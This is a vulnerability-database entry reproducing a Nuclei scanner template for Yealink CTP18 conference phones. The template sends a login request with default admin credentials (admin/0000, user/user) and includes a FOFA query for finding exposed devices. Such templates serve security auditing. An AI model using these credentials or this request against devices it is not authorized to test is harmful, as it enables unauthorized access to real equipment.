yealink-default-login: Yealink CTP18 - Default Login

日期: 2025-08-01 | 影响软件: Yealink CTP18 | POC: 已公开

漏洞描述

Yealink CTP18 Default Administrator Credentials Discovered.

PoC代码[已公开]

id: yealink-default-login

info:
  name: Yealink CTP18 - Default Login
  author: parzival,arbenn@pretera.com
  severity: high
  description: |
    Yealink CTP18 Default Administrator Credentials Discovered.
  reference:
    - https://support.yealink.com
  metadata:
    verified: true
    max-request: 1
    fofa-query: Yealink CTP18
  tags: default-login,yealink,vuln

http:
  - raw:
      - |
        POST /api/auth/login?p=Login&t=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: application/json, text/plain, */*

        username={{username}}&pwd={{password}}

    attack: pitchfork
    payloads:
      username:
        - admin
        - user
      password:
        - '0000'
        - user

    host-redirects: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"ret":"ok","data":true}'
          - '{"ret":"ok","data":"ok"}'
        condition: or

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a004630440220318d054afb3340844a5206a9372fc759e7405e4518f7c0d2f1c95f36e35ed350022035953a9a4171eff1f8a2afc1b5e9b61ea384c3609eb0f95a6038ae8020ce430e:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/yealink/yealink-default-login.yaml